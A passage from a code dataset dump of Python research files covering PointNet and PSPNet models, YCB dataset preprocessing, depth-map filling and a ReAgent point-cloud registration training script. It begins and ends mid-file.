features = (pc[..., 3:].transpose(1, 2).contiguous() if pc.size(-1) > 3 else None)
return xyz, features
def forward(self, pointcloud: torch.cuda.FloatTensor):
r"""
Forward pass of the network
Parameters
----------
pointcloud: Variable(torch.cuda.FloatTensor)
(B, N, 3 + input_channels) tensor
Point cloud to run predicts on
Each point in the point-cloud MUST
be formated as (x, y, z, features...)
"""
xyz, features = self._break_up_pc(pointcloud)
l_xyz, l_features = [xyz], [features]
for i in range(len(self.SA_modules)):
li_xyz, li_features = self.SA_modules[i](l_xyz[i], l_features[i])
l_xyz.append(li_xyz)
l_features.append(li_features)
for i in range(-1, -(len(self.FP_modules) + 1), -1):
l_features[i - 1] = self.FP_modules[i](l_xyz[i - 1], l_xyz[i], l_features[i - 1], l_features[i])
# return self.FC_layer(l_features[0])
return self.FC_layer(l_features[0].unsqueeze(-1)).squeeze(-1)
def model_fn_decorator(criterion):
ModelReturn = namedtuple("ModelReturn", ['preds', 'loss', 'acc'])
def model_fn(model, data, eval=False):
with torch.set_grad_enabled(not eval):
inputs, labels = data
inputs = inputs.cuda(non_blocking=True)
labels = labels.cuda(non_blocking=True)
preds = model(inputs)
loss = criterion(preds, labels)
_, classes = torch.max(preds, 1)
acc = (classes == labels).float().sum() / labels.numel()
return ModelReturn(preds, loss, {"acc": acc.item(), 'loss': loss.item()})
return model_fn
if __name__ == "__main__":
import torch.optim as optim
B, N, C, K = 2, 4096, 3, 13
inputs = torch.randn(B, N, 6)#.cuda()
labels = torch.randint(0, 3, (B, N))#.cuda()
model = PointNet2SSGSeg(c=C, k=K)#.cuda()
optimizer = optim.SGD(model.parameters(), lr=5e-2, momentum=0.9, weight_decay=1e-4)
print("Testing SSGCls with xyz")
model_fn = model_fn_decorator(nn.CrossEntropyLoss())
for _ in range(5):
optimizer.zero_grad()
_, loss, _ = model_fn(model, (inputs, labels))
loss.backward()
print(loss.item())
optimizer.step()
model = PointNet2SSGSeg(c=C, k=K, use_xyz=False).cuda()
optimizer = optim.SGD(model.parameters(), lr=5e-2, momentum=0.9, weight_decay=1e-4)
print("Testing SSGCls without xyz")
model_fn = model_fn_decorator(nn.CrossEntropyLoss())
for _ in range(5):
optimizer.zero_grad()
_, loss, _ = model_fn(model, (inputs, labels))
loss.backward()
print(loss.item())
optimizer.step()
```
#### File: model/pointnet/pointnet.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class STN3D(nn.Module):
def __init__(self, c):
super(STN3D, self).__init__()
self.c = c
self.conv1 = nn.Conv1d(self.c, 64, 1)
self.conv2 = nn.Conv1d(64, 128, 1)
self.conv3 = nn.Conv1d(128, 1024, 1)
self.mp = nn.AdaptiveMaxPool1d(1)
self.fc1 = nn.Linear(1024, 512)
self.fc2 = nn.Linear(512, 256)
self.fc3 = nn.Linear(256, self.c*self.c)
self.bn1 = nn.BatchNorm1d(64)
self.bn2 = nn.BatchNorm1d(128)
self.bn3 = nn.BatchNorm1d(1024)
self.bn4 = nn.BatchNorm1d(512)
self.bn5 = nn.BatchNorm1d(256)
def forward(self, x):
batch_size = x.size()[0]
x = F.relu(self.bn1(self.conv1(x)))
x = F.relu(self.bn2(self.conv2(x)))
x = F.relu(self.bn3(self.conv3(x)))
x = self.mp(x)
x = x.view(-1, 1024)
x = F.relu(self.bn4(self.fc1(x)))
x = F.relu(self.bn5(self.fc2(x)))
x = self.fc3(x)
iden = torch.eye(self.c).view(1, -1).repeat(batch_size, 1)
if x.is_cuda:
iden = iden.cuda()
x = x + iden
x = x.view(-1, self.c, self.c)
return x
class PointNetFeat(nn.Module):
def __init__(self, c=3, global_feat=True):
super(PointNetFeat, self).__init__()
self.global_feat = global_feat
self.stn1 = STN3D(c)
self.conv1 = nn.Conv1d(c, 64, 1)
self.conv2 = nn.Conv1d(64, 64, 1)
self.stn2 = STN3D(64)
self.conv3 = nn.Conv1d(64, 64, 1)
self.conv4 = nn.Conv1d(64, 128, 1)
self.conv5 = nn.Conv1d(128, 1024, 1)
self.mp = nn.AdaptiveMaxPool1d(1)
self.bn1 = nn.BatchNorm1d(64)
self.bn2 = nn.BatchNorm1d(64)
self.bn3 = nn.BatchNorm1d(64)
self.bn4 = nn.BatchNorm1d(128)
self.bn5 = nn.BatchNorm1d(1024)
def forward(self, x):
stn1 = self.stn1(x)
x = torch.bmm(stn1, x)
x = F.relu(self.bn1(self.conv1(x)))
x = F.relu(self.bn2(self.conv2(x)))
stn2 = self.stn2(x)
x_tmp = torch.bmm(stn2, x)
x = F.relu(self.bn3(self.conv3(x_tmp)))
x = F.relu(self.bn4(self.conv4(x)))
x = F.relu(self.bn5(self.conv5(x)))
x = self.mp(x)
x = x.view(-1, 1024)
if not self.global_feat:
x = x.view(-1, 1024, 1).repeat(1, 1, x_tmp.size()[2])
x = torch.cat([x_tmp, x], 1)
return x
class PointNetCls(nn.Module):
def __init__(self, c=3, k=40, dropout=0.3, sync_bn=False):
super(PointNetCls, self).__init__()
self.feat = PointNetFeat(c, global_feat=True)
self.fc1 = nn.Linear(1024, 512)
self.fc2 = nn.Linear(512, 256)
self.fc3 = nn.Linear(256, k)
self.bn1 = nn.BatchNorm1d(512)
self.bn2 = nn.BatchNorm1d(256)
self.dropout = nn.Dropout(p=dropout)
def forward(self, x):
x = x.transpose(1, 2)
x = self.feat(x)
x = F.relu(self.bn1(self.fc1(x)))
x = F.relu(self.bn2(self.fc2(x)))
x = self.dropout(x)
x = self.fc3(x)
return x
# Segmentation with 9 channels input XYZ, RGB and normalized location to the room (from 0 to 1), with STN3D on input and feature
class PointNetSeg(nn.Module):
def __init__(self, c=9, k=13, sync_bn=False):
super(PointNetSeg, self).__init__()
self.feat = PointNetFeat(c, global_feat=False)
self.conv1 = nn.Conv1d(1088, 512, 1)
self.conv2 = nn.Conv1d(512, 256, 1)
self.conv3 = nn.Conv1d(256, 128, 1)
self.conv4 = nn.Conv1d(128, 128, 1)
self.conv5 = nn.Conv1d(128, k, 1)
self.bn1 = nn.BatchNorm1d(512)
self.bn2 = nn.BatchNorm1d(256)
self.bn3 = nn.BatchNorm1d(128)
self.bn4 = nn.BatchNorm1d(128)
def forward(self, x):
x = x.transpose(1, 2)
x = self.feat(x)
x = F.relu(self.bn1(self.conv1(x)))
x = F.relu(self.bn2(self.conv2(x)))
x = F.relu(self.bn3(self.conv3(x)))
x = F.relu(self.bn4(self.conv4(x)))
x = self.conv5(x)
return x
if __name__ == '__main__':
import os
os.environ["CUDA_VISIBLE_DEVICES"] = '0'
sim_data = torch.rand(16, 2048, 3)
trans = STN3D(c=3)
out = trans(sim_data.transpose(1, 2))
print('stn', out.size())
point_feat = PointNetFeat(global_feat=True)
out = point_feat(sim_data.transpose(1, 2))
print('global feat', out.size())
point_feat = PointNetFeat(global_feat=False)
out = point_feat(sim_data.transpose(1, 2))
print('point feat', out.size())
cls = PointNetCls(c=3, k=40)
out = cls(sim_data)
print('class', out.size())
sim_data = torch.rand(16, 2048, 9)
seg = PointNetSeg(c=9, k=13)
out = seg(sim_data)
print('seg', out.size())
```
#### File: scene_seg/util/paconv_util.py
```python
import torch
def weight_init(m):
# print(m)
if isinstance(m, torch.nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
if m.bias is not None:
torch.nn.init.constant_(m.bias, 0)
elif isinstance(m, torch.nn.Conv2d):
torch.nn.init.xavier_normal_(m.weight)
if m.bias is not None:
torch.nn.init.constant_(m.bias, 0)
elif isinstance(m, torch.nn.Conv1d):
torch.nn.init.xavier_normal_(m.weight)
if m.bias is not None:
torch.nn.init.constant_(m.bias, 0)
elif isinstance(m, torch.nn.BatchNorm2d):
torch.nn.init.constant_(m.weight, 1)
torch.nn.init.constant_(m.bias, 0)
elif isinstance(m, torch.nn.BatchNorm1d):
torch.nn.init.constant_(m.weight, 1)
torch.nn.init.constant_(m.bias, 0)
def get_graph_feature(x, k, idx):
batch_size = x.size(0)
num_points = x.size(2)
x = x.view(batch_size, -1, num_points)
idx_base = torch.arange(0, batch_size, device=x.device).view(-1, 1, 1) * num_points
idx = idx + idx_base
idx = idx.view(-1)
_, num_dims, _ = x.size()
x = x.transpose(2, 1).contiguous()
neighbor = x.view(batch_size * num_points, -1)[idx, :]
neighbor = neighbor.view(batch_size, num_points, k, num_dims)
x = x.view(batch_size, num_points, 1, num_dims).repeat(1, 1, k, 1)
feature = torch.cat((neighbor - x, neighbor), dim=3) # (xj-xi, xj): b,n,k,2c
return feature
def assign_score(score, point_input):
B, N, K, m = score.size()
score = score.view(B, N, K, 1, m)
point_output = torch.matmul(score, point_input).view(B, N, K, -1) # b,n,k,cout
return point_output
def get_ed(x, y):
ed = torch.norm(x - y, dim=-1).reshape(x.shape[0], 1)
return ed
def assign_kernel_withoutk(in_feat, kernel, M):
B, Cin, N0 = in_feat.size()
in_feat_trans = in_feat.permute(0, 2, 1)
out_feat_half1 = torch.matmul(in_feat_trans, kernel[:Cin]).view(B, N0, M, -1) # b,n,m,o1
out_feat_half2 = torch.matmul(in_feat_trans, kernel[Cin:]).view(B, N0, M, -1) # b,n,m,o1
if in_feat.size(1) % 2 != 0:
out_feat_half_coord = torch.matmul(in_feat_trans[:, :, :3], kernel[Cin: Cin + 3]).view(B, N0, M, -1) # b,n,m,o1
else:
out_feat_half_coord = torch.zeros_like(out_feat_half2)
return out_feat_half1 + out_feat_half2, out_feat_half1 + out_feat_half_coord
``` |
{
"source": "JiazeWang/PVN3D",
"score": 2
} |
#### File: datasets/ycb/preprocess_testset.py
```python
import os
import cv2
import tqdm
import torch
import os.path
import numpy as np
from common import Config
import pickle as pkl
from lib.utils.basic_utils import Basic_Utils
import scipy.io as scio
import scipy.misc
from datasets.ycb.ycb_dataset import YCB_Dataset
config = Config(dataset_name='ycb')
bs_utils = Basic_Utils(config)
torch.multiprocessing.set_sharing_strategy('file_system')
def worker_init_fn(worker_id):
np.random.seed(np.random.get_state()[1][0] + worker_id)
def main():
if os.path.exists(config.preprocessed_testset_pth):
return
test_ds = YCB_Dataset('test')
test_loader = torch.utils.data.DataLoader(
test_ds, batch_size=config.test_mini_batch_size, shuffle=False,
num_workers=40, worker_init_fn=worker_init_fn
)
data_lst = []
for i, data in tqdm.tqdm(
enumerate(test_loader), leave=False, desc='Preprocessing valtestset'
):
bs, _, _, _ = data[0].shape
for ibs in range(bs):
i_data = [item[ibs] for item in data]
if len(i_data) < 11:
print(len(i_data))
data_lst.append(i_data)
pkl.dump(data_lst, open(config.preprocessed_testset_pth, 'wb'))
if __name__ == "__main__":
main()
# vim: ts=4 sw=4 sts=4 expandtab
```
#### File: utils/ip_basic/ycb_fill_depth.py
```python
import os
import time
import cv2
import numpy as np
import pickle as pkl
import png
import nori2
from ip_basic import depth_map_utils, depth_map_utils_ycb
from ip_basic import vis_utils
import sys
sys.path.append('..')
from lib.utils.my_utils import my_utils
from neupeak.utils.webcv2 import imshow, waitKey
from tqdm import tqdm
import concurrent.futures
nf = nori2.Fetcher()
def show_depth(name, dpt):
dpt = (dpt / np.max(dpt) * 255).astype(np.uint8)
imshow(name, dpt)
def get_one_show(nid):
fill_type = 'multiscale'
# fill_type = 'fast'
show_process = False
extrapolate = True# False # True
# blur_type = 'gaussian'
blur_type = 'bilateral'
data = pkl.loads(nf.get(nid))
bk_label = data['label']
bk_label = bk_label <= 0
bk_label_3c = np.repeat(bk_label[:, :, None], 3, 2)
rgb_back = data['rgb'][:, :, :3] * bk_label_3c
dpt_back = data['depth'].astype(np.float32) # * bk_label.astype(np.float32)
cam_scale = data['meta']['factor_depth'].astype(np.float32)[0][0]
scale_2_80 = 1 #80 / 4.6 # test
scale_2_80 = 1 #80 / 6.6 # train_real
dpt_back = dpt_back / cam_scale * scale_2_80
pcld, choose = my_utils.dpt_2_cld(
data['depth'], cam_scale, data['obj_info_lst'][0]['K']
)
nrm = my_utils.get_normal(pcld)
nrm_map = my_utils.get_normal_map(nrm, choose)
print('dpt range(min, max): ', np.min(dpt_back), np.max(dpt_back), cam_scale)
projected_depth = dpt_back.copy()
start_fill_time = time.time()
if fill_type == 'fast':
final_dpt = depth_map_utils_ycb.fill_in_fast(
projected_depth, extrapolate=extrapolate, blur_type=blur_type,
# max_depth=120.0
)
elif fill_type == 'multiscale':
final_dpt, process_dict = depth_map_utils_ycb.fill_in_multiscale(
projected_depth, extrapolate=extrapolate, blur_type=blur_type,
show_process=show_process,
# max_depth=120.0
)
else:
raise ValueError('Invalid fill_type {}'.format(fill_type))
end_fill_time = time.time()
pcld, choose = my_utils.dpt_2_cld(
final_dpt, scale_2_80, data['obj_info_lst'][0]['K']
)
nrm = my_utils.get_normal(pcld)
nrm_map_final = my_utils.get_normal_map(nrm, choose)
show_dict = dict(
ori_dpt = dpt_back,
final_dpt = final_dpt,
rgb = data['rgb'][:, :, :3][...,::-1].astype(np.uint8),
nrm_map = nrm_map,
nrm_map_final = nrm_map_final,
)
return show_dict
def complete_dpt(nid_p):
nid_lst = my_utils.read_lines(nid_p)
# fill_type = 'fast'
cnt = 0
import random
# random.shuffle(nid_lst)
with concurrent.futures.ProcessPoolExecutor(15) as executor:
for info in executor.map(get_one_show, nid_lst):
print(np.min(info['final_dpt']), np.max(info['final_dpt']))
show_depth('ori_dpth', info['ori_dpt'])
show_depth('cmplt_dpth', info['final_dpt'])
imshow('rgb', info['rgb'])
imshow('nrm_map', info['nrm_map'])
imshow('nrm_map_final', info['nrm_map_final'])
if cnt == 0:
cmd = waitKey(0)
# cnt += 1
else:
cmd = waitKey(2)
def get_one_depth(nid):
data = pkl.loads(nf.get(nid))
dpt_back = data['depth'].astype(np.float32) # * bk_label.astype(np.float32)
cam_scale = data['meta']['factor_depth'].astype(np.float32)[0][0]
# K = data['obj_info_lst'][0]['K']
# print(K)
dpt_back = dpt_back / cam_scale
dpt_back = dpt_back.reshape(-1)
max_dpt = dpt_back[np.argpartition(dpt_back, -100)[-100:]]
return np.mean(max_dpt)
def get_depth_max_statics(nid_p):
print(nid_p)
nid_lst = my_utils.read_lines(nid_p)
# nid_lst = nid_lst[:2] + nid_lst[-2:]
max_dp = 0.0
with concurrent.futures.ProcessPoolExecutor(15) as executor:
for dpt in tqdm(executor.map(get_one_depth, nid_lst)):
if dpt > max_dp:
max_dp = dpt
print("max_dp: ", max_dp)
def main():
nid_lst_p_lst = [
'/data/ycb_linemod_datasets/ycb/pose_nori_lists/allobj_test_real.nori.list',
'/data/ycb_linemod_datasets/ycb/pose_nori_lists/allobj_train_real.nori.list',
'/data/ycb_linemod_datasets/ycb/pose_nori_lists/allobj_train_syn.nori.list',
# '/data/ycb_linemod_datasets/ycb/ycb_train_rdlm.nori.list',
# '/data/ycb_linemod_datasets/ycb/ycb_train_syn_rdlm.nori.list',
# '/data/ycb_linemod_datasets/ycb/ycb_train_real_rdlm.nori.list',
# '/data/ycb_linemod_datasets/ycb/ycb_test_rdlm.nori.list'
]
complete_dpt(nid_lst_p_lst[0])
for nid_lst_p in nid_lst_p_lst:
get_depth_max_statics(nid_lst_p)
if __name__ == "__main__":
main()
# vim: ts=4 sw=4 sts=4 expandtab
``` |
{
"source": "JiazeWang/reagent",
"score": 3
} |
#### File: reagent/registration_dense/pspnet.py
```python
import math
import torch
from torch import nn
from torch.nn import functional as F
def conv3x3(in_planes, out_planes, stride=1, dilation=1):
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=dilation, dilation=dilation, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, dilation=1):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride=stride, dilation=dilation)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes, stride=1, dilation=dilation)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.relu(out)
out = self.conv2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers=(3, 4, 23, 3)):
self.inplanes = 64
super(ResNet, self).__init__()
self.conv1 = nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3, bias=False)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=1, dilation=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=1, dilation=4)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2./n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1, dilation=1):
downsample = None
if stride != 1 or self.inplanes != planes*block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes*block.expansion, kernel_size=1, stride=stride, bias=False)
)
layers = [block(self.inplanes, planes, stride, downsample)]
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, dilation=dilation))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
return x
class PSPModule(nn.Module):
def __init__(self, feat_dim, bins=(1, 2, 3, 6)):
super(PSPModule, self).__init__()
self.reduction_dim = feat_dim // len(bins)
self.stages = []
self.stages = nn.ModuleList([self._make_stage(feat_dim, size) for size in bins])
def _make_stage(self, feat_dim, size):
prior = nn.AdaptiveAvgPool2d(output_size=(size, size))
conv = nn.Conv2d(feat_dim, self.reduction_dim, kernel_size=1, bias=False)
relu = nn.ReLU(inplace=True)
return nn.Sequential(prior, conv, relu)
def forward(self, feats):
h, w = feats.size(2), feats.size(3)
priors = [feats]
for stage in self.stages:
priors.append(F.interpolate(input=stage(feats), size=(h, w), mode='bilinear', align_corners=True))
return torch.cat(priors, 1)
class PSPUpsample(nn.Module):
def __init__(self, in_channels, out_channels):
super(PSPUpsample, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(in_channels, out_channels, 3, padding=1),
nn.PReLU()
)
def forward(self, x):
x = F.interpolate(x, scale_factor=2, mode='bilinear', align_corners=True)
return self.conv(x)
class PSPNet(nn.Module):
def __init__(self, bins=(1, 2, 3, 6), backend='resnet18'):
super(PSPNet, self).__init__()
if backend == 'resnet18':
self.feats = ResNet(BasicBlock, [2, 2, 2, 2])
feat_dim = 512
else:
raise NotImplementedError
self.psp = PSPModule(feat_dim, bins)
self.drop = nn.Dropout2d(p=0.15)
self.up_1 = PSPUpsample(1024, 256)
self.up_2 = PSPUpsample(256, 64)
self.up_3 = PSPUpsample(64, 64)
self.final = nn.Conv2d(64, 32, kernel_size=1)
def forward(self, x):
f = self.feats(x)
p = self.psp(f)
#print("psp:", p.shape)
#psp: torch.Size([32, 1024, 24, 24])
p = self.up_1(p)
#up1: torch.Size([32, 256, 48, 48])
#print("up1:", p.shape)
p = self.drop(p)
p = self.up_2(p)
#print("up2:", p.shape)
#up2: torch.Size([32, 64, 96, 96])
p = self.drop(p)
p = self.up_3(p)
#print("up3:", p.shape)
#up3: torch.Size([32, 64, 192, 192])
return self.final(p)
```
#### File: reagent/registration/train_pn_2D_mgpus_e50.py
```python
import numpy as np
np.random.seed(42)
import torch
torch.manual_seed(42)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
torch.set_default_dtype(torch.float32)
import torch.nn.functional as F
import torch.nn as nn
import os
from tqdm import tqdm
from prefetch_generator import BackgroundGenerator
import argparse
import sys
sys.path.append(os.path.dirname(os.path.abspath(__file__)).replace("/registration", ""))
from environment import environment as env
from environment import transformations as tra
from environment.buffer import Buffer
from registration.model_pn_2D import Agent
import registration.model_pn_2D as util_model
import utility.metrics as metrics
from utility.logger import Logger
from dataset.dataset import DatasetModelnet40, DatasetLinemod
import config as cfg
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def train(agent, logger, dataset, noise_type, epochs, lr, lr_step, alpha, model_path, reward_mode=""):
optimizer = torch.optim.Adam(agent.parameters(), lr=lr, amsgrad=True)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, lr_step, 0.5)
Dataset = DatasetModelnet40 if dataset == "m40" else DatasetLinemod
train_dataset = Dataset("train", noise_type)
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=cfg.BATCH_SIZE, shuffle=True)
val_dataset = Dataset("val", noise_type)
val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=cfg.BATCH_SIZE, shuffle=False)
test_dataset = Dataset("test" if dataset == "m40" else "eval", noise_type)
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=cfg.BATCH_SIZE, shuffle=False)
RANDOM_STATE = np.random.get_state() # otherwise loader produces deterministic samples after iter 1
losses_bc, losses_ppo, train_rewards, final_rewards = [], [], [], []
episode = 0 # for loss logging (not using epoch)
best_chamfer = np.infty
buffer = Buffer()
buffer.start_trajectory()
for epoch in range(epochs):
print(f"Epoch {epoch}")
# -- train
agent.train()
np.random.set_state(RANDOM_STATE)
progress = tqdm(BackgroundGenerator(train_loader), total=len(train_loader))
for data in progress:
with torch.no_grad():
# per sample, generate a full trajectory
source, target, pose_source, pose_target = env.init(data)
if cfg.DISENTANGLED:
pose_target = tra.to_disentangled(pose_target, source)
current_source = source
if reward_mode == "goal":
reward = env.reward_goal(pose_source, pose_target)
elif reward_mode == "step":
gt_pcd_source = tra.apply_trafo(current_source, pose_target, disentangled=cfg.DISENTANGLED)
_, prev_chamfer = env.reward_step(current_source, gt_pcd_source)
# STAGE 1: generate trajectories
for step in range(cfg.ITER_TRAIN):
# expert prediction
expert_action = env.expert(pose_source, pose_target, mode=cfg.EXPERT_MODE)
# student prediction -- stochastic policy
state_emb, action_logit, state_value, _ = agent(current_source, target)
action = util_model.action_from_logits(action_logit, deterministic=False)
action_logprob, action_entropy = util_model.action_stats(action_logit, action)
# step environment and get reward
new_source, pose_source = env.step(source, action, pose_source, cfg.DISENTANGLED)
if reward_mode == "goal":
reward = env.reward_goal(pose_source, pose_target)
elif reward_mode == "step":
reward, prev_chamfer = env.reward_step(new_source, gt_pcd_source, prev_chamfer)
else:
reward = torch.zeros((pose_source.shape[0], 1, 1)).to(DEVICE)
# log trajectory
buffer.log_step([current_source, target], state_value, reward,
expert_action,
action, action_logit, action_logprob)
current_source = new_source
train_rewards.append(reward.view(-1))
final_rewards.append(reward.view(-1))
if len(buffer) == cfg.NUM_TRAJ:
# STAGE 2: policy (and value estimator) update using BC (and PPO)
# convert buffer to tensor of samples (also computes return and advantage over trajectories)
samples = buffer.get_samples()
ppo_dataset = torch.utils.data.TensorDataset(*samples)
ppo_loader = torch.utils.data.DataLoader(ppo_dataset, batch_size=cfg.BATCH_SIZE, shuffle=True,
drop_last=False)
# sample batches from buffer and update
for batch in ppo_loader:
sources, targets, \
expert_actions, state_values, \
actions, action_logits, action_logprobs, \
returns, advantages = batch
# -- predict using current policy
new_state_emb, new_action_logit, new_values, _ = agent(sources, targets)
new_action_logprob, new_action_entropy = util_model.action_stats(new_action_logit, actions)
# -- clone term
loss_translation = F.cross_entropy(new_action_logit[0].view(-1, 11, 1, 1, 1),
expert_actions[:, 0].reshape(-1, 1, 1, 1))
loss_rotation = F.cross_entropy(new_action_logit[1].view(-1, 11, 1, 1, 1),
expert_actions[:, 1].reshape(-1, 1, 1, 1))
clone_loss = (loss_translation + loss_rotation) / 2
if alpha > 0:
# -- policy term
# ratio: lp > prev_lp --> probability of selecting that action increased
ratio = torch.exp(new_action_logprob - action_logprobs).reshape(-1, 6)
policy_loss = -torch.min(ratio * advantages.repeat(1, 6),
ratio.clamp(1 - cfg.CLIP_EPS,
1 + cfg.CLIP_EPS) * advantages.repeat(1, 6)).mean()
# -- value term
value_loss = (new_values.view(-1, 1) - returns).pow(2)
if cfg.CLIP_VALUE:
values_clipped = state_values + (new_values - state_values)\
.clamp(-cfg.CLIP_EPS, cfg.CLIP_EPS)
losses_v_clipped = (values_clipped.view(-1, 1) - returns).pow(2)
value_loss = torch.max(value_loss, losses_v_clipped)
value_loss = value_loss.mean()
# -- entropy term
entropy_loss = new_action_entropy.mean()
# -- update
optimizer.zero_grad()
loss = clone_loss
losses_bc.append(clone_loss.item())
if alpha > 0:
ppo_loss = policy_loss + value_loss * cfg.C_VALUE - entropy_loss * cfg.C_ENTROPY
loss += ppo_loss * alpha
losses_ppo.append(ppo_loss.item())
loss.backward()
optimizer.step()
# logging
if alpha > 0:
logger.record("train/ppo", np.mean(losses_ppo))
logger.record("train/bc", np.mean(losses_bc))
logger.record("train/reward", float(torch.cat(train_rewards, dim=0).mean()))
logger.record("train/final_reward", float(torch.cat(final_rewards, dim=0).mean()))
logger.dump(step=episode)
# reset
losses_bc, losses_ppo, train_rewards, final_rewards = [], [], [], []
buffer.clear()
episode += 1
buffer.start_trajectory()
scheduler.step()
RANDOM_STATE = np.random.get_state() # evaluation sets seeds again -- keep random state of the training stage
# -- test
if val_loader is not None:
chamfer_val = evaluate(agent, logger, val_loader, prefix='val')
if test_loader is not None:
chamfer_test = evaluate(agent, logger, test_loader)
if chamfer_test <= best_chamfer:
print(f"new best: {chamfer_test}")
best_chamfer = chamfer_test
infos = {
'epoch': epoch,
'optimizer_state_dict': optimizer.state_dict()
}
util_model.save(agent, f"{model_path}_mgpu_shared_p50.zip", infos)
model_epoch_path = os.path.join(code_path, f"weights/p50_shared_mgpus_pn_2d_{dataset}_{mode}_{str(epoch)}")
util_model.save(agent, f"{model_epoch_path}.zip", infos)
logger.dump(step=epoch)
def evaluate(agent, logger, loader, prefix='test'):
agent.eval()
progress = tqdm(BackgroundGenerator(loader), total=len(loader))
predictions = []
val_losses = []
with torch.no_grad():
for data in progress:
source, target, pose_source, pose_target = env.init(data)
if cfg.DISENTANGLED:
pose_target = tra.to_disentangled(pose_target, source)
current_source = source
for step in range(cfg.ITER_EVAL):
expert_action = env.expert(pose_source, pose_target, mode=cfg.EXPERT_MODE)
state_emb, action_logit, _, _ = agent(current_source, target)
action = util_model.action_from_logits(action_logit, deterministic=True)
loss_translation = F.cross_entropy(action_logit[0].view(-1, 11, 1, 1, 1),
expert_action[:, 0].reshape(-1, 1, 1, 1))
loss_rotation = F.cross_entropy(action_logit[1].view(-1, 11, 1, 1, 1),
expert_action[:, 1].reshape(-1, 1, 1, 1))
val_losses.append((loss_translation + loss_rotation).item()/2)
current_source, pose_source = env.step(source, action, pose_source, cfg.DISENTANGLED)
if cfg.DISENTANGLED:
pose_source = tra.to_global(pose_source, source)
predictions.append(pose_source)
predictions = torch.cat(predictions)
_, summary_metrics = metrics.compute_stats(predictions, data_loader=loader)
# log test metrics
if isinstance(loader.dataset, DatasetLinemod):
logger.record(f"{prefix}/add", summary_metrics['add'])
logger.record(f"{prefix}/adi", summary_metrics['adi'])
return summary_metrics['add']
else:
logger.record(f"{prefix}/mae-r", summary_metrics['r_mae'])
logger.record(f"{prefix}/mae-t", summary_metrics['t_mae'])
logger.record(f"{prefix}/iso-r", summary_metrics['r_iso'])
logger.record(f"{prefix}/iso-t", summary_metrics['t_iso'])
logger.record(f"{prefix}/chamfer", summary_metrics['chamfer_dist'])
logger.record(f"{prefix}/adi-auc", summary_metrics['adi_auc10'] * 100)
return summary_metrics['chamfer_dist']
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='ReAgent - training on ModelNet40 and LINEMOD')
parser.add_argument('--mode', type=str, default='il', choices=['pretrain', 'il', 'ilrl'],
help='pretraining (pretrain), IL-only (il), IL+RL with a step-wise reward (ilrls).')
parser.add_argument('--dataset', type=str, default='m40', choices=['m40', 'lm'],
help='Dataset used for training. All experiments on ModelNet40 and ScanObjectNN use the same '
'weights - train both with "m40". Experiments on LINEMOD ("lm") use no pretraining.')
args = parser.parse_args()
# PATHS
dataset = args.dataset
mode = args.mode
code_path = os.path.dirname(os.path.abspath(__file__)).replace("/registration", "")
if not os.path.exists(os.path.join(code_path, "logs")):
os.mkdir(os.path.join(code_path, "logs"))
if not os.path.exists(os.path.join(code_path, "weights")):
os.mkdir(os.path.join(code_path, "weights"))
model_path = os.path.join(code_path, f"weights/{dataset}_{mode}")
logger = Logger(log_dir=os.path.join(code_path, f"logs/{dataset}/"), log_name=f"pre50_shared_mGPUs_2D_pn_{mode}",
reset_num_timesteps=True)
if torch.cuda.device_count() > 1:
print("Using multiple GPUs")
else:
print("Using single GPU")
# TRAINING
agent = nn.DataParallel(Agent()).to(DEVICE)
if args.mode == "pretrain" and dataset == "m40":
print(f"Training: dataset '{dataset}' - mode '{args.mode}'")
train(agent, logger, dataset, noise_type="clean", epochs=50, lr=1e-3, lr_step=20, alpha=0,
model_path=model_path)
else:
if args.mode == "il":
alpha = 0.0
reward_mode = ""
elif args.mode == "ilrl":
alpha = 2.0 if dataset == "m40" else 0.1 # reduced influence on lm
reward_mode = "step"
else:
raise ValueError("No pretraining on LINEMOD. Use 'il' or 'ilrl' instead.")
print(f"Training: dataset '{dataset}' - mode '{args.mode}'{f' - alpha={alpha}' if args.mode != 'il' else ''}")
if dataset == "m40":
print(" loading pretrained weights...")
if os.path.exists(os.path.join(code_path, f"weights/m40_pretrain_mgpu_shared.zip")):
util_model.load(agent, os.path.join(code_path, f"weights/m40_pretrain_mgpu_shared.zip"))
else:
raise FileNotFoundError(f"No pretrained weights found at "
f"{os.path.join(code_path, f'weights/m40_pretrain.zip')}. Run with "
f"'pretrain' first or download the provided weights.")
noise_type = "jitter" if dataset == "m40" else "segmentation"
epochs = 100 if dataset == "m40" else 200
lr = 1e-4 if dataset == "m40" else 1e-3
